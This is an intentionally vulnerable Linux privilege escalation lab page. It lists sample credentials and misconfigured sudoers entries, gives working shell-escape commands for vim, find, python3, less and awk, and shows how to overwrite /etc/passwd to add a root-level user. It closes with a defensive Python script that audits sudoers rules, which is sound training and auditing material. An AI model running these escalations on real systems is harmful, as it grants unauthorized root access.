🐧 Linux Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo  |  alice / alice123  |  root / toor (goal: escalate to this)

Sudo Misconfiguration

PRIVILEGE ESCALATION
# List the commands your user may run via sudo (look for NOPASSWD entries):
sudo -l

# Vulnerable /etc/sudoers entries:
ram ALL=(ALL) NOPASSWD: /usr/bin/vim        ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/find       ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/python3    ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/less       ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/awk        ← can escalate
ram ALL=(ALL) NOPASSWD: /bin/cp             ← can overwrite files as root
ram ALL=(ALL) NOPASSWD: /bin/chmod          ← can chmod any file

# Exploit: sudo vim
sudo vim -c ':!/bin/bash'

# Exploit: sudo find
sudo find . -exec /bin/bash \; -quit

# Exploit: sudo python3
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'

# Exploit: sudo less
sudo less /etc/passwd
# then, at the less prompt, type:
!/bin/bash

# Exploit: sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'

# Exploit: sudo cp — overwrite /etc/passwd
# Generate a password hash first:
openssl passwd -1 -salt hacker hacker123
# Output: $1$hacker$...hash...

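# Make a working copy of /etc/passwd and append a new UID 0 user
# (replace $1$hacker$HASH with the full openssl output from above):
cp /etc/passwd /tmp/passwd
echo 'hacker:$1$hacker$HASH:0:0:root:/root:/bin/bash' >> /tmp/passwd
# Copy the modified file over /etc/passwd: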
sudo cp /tmp/passwd /etc/passwd
su hacker  # password: hacker123
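
Seen from the defender's side, the listing above doubles as an audit checklist. The following is an added example, not part of the lab's own material: it parses sudoers-style rules and flags root grants for the binaries named in this section. The name `audit_sudoers`, the risk labels and the sample rules are assumptions constructed for illustration; aliases, includes and escaped commas are not handled.

```python
import os
import re

# Binaries from the lab's sudoers listing, grouped by the risk they pose under sudo.
SHELL_ESCAPE = {"vim", "find", "python3", "less", "awk"}  # can start a root shell
FILE_TAMPER = {"cp", "chmod"}  # can replace or re-permission root-owned files
RULE = re.compile(r"^(\S+)\s+[^\s=]+\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")  # user host=(runas) cmds
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # e.g. "NOPASSWD: "

def audit_sudoers(text):
    """Return (line_no, user, path, risk, nopasswd) for each risky root grant."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # simplification: also drops #include lines
        m = RULE.match(line)
        if not m or line.startswith("Defaults") or "_Alias" in line:
            continue
        user, runas, cmds = m.groups()
        # No runas list means root; otherwise inspect the user part before ':'.
        targets = {"root"} if runas is None else {r.strip() for r in runas.split(":")[0].split(",")}
        if not targets & {"root", "ALL"}:
            continue
        nopasswd = False
        for item in cmds.split(","):  # simplification: ignores escaped commas in arguments
            item = item.strip()
            tag = TAGS.match(item)
            if tag:  # a tag carries over to later commands in the same list
                for name in re.findall(r"[A-Z_]+", tag.group(0)):
                    nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(name, nopasswd)
                item = item[tag.end():]
            path = (item.split() or [""])[0]
            base = os.path.basename(path)
            risk = ("unrestricted" if path == "ALL" else "shell-escape" if base in SHELL_ESCAPE
                    else "file-tamper" if base in FILE_TAMPER else None)
            if risk:
                findings.append((line_no, user, path, risk, nopasswd))
    return findings

# Constructed sample: entries in the style of the lab's listing plus one benign rule.
SAMPLE = """\
ram ALL=(ALL) NOPASSWD: /usr/bin/vim
ram ALL=(ALL) NOPASSWD: /usr/bin/find, /bin/cp
alice ALL=(ALL) /usr/bin/systemctl status nginx
alice ALL=(ALL) PASSWD: /usr/bin/less /var/log/syslog
"""
if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

The last sample rule is still reported even though it requires a password and pins an argument, because the pager can start a shell regardless of which file it opens.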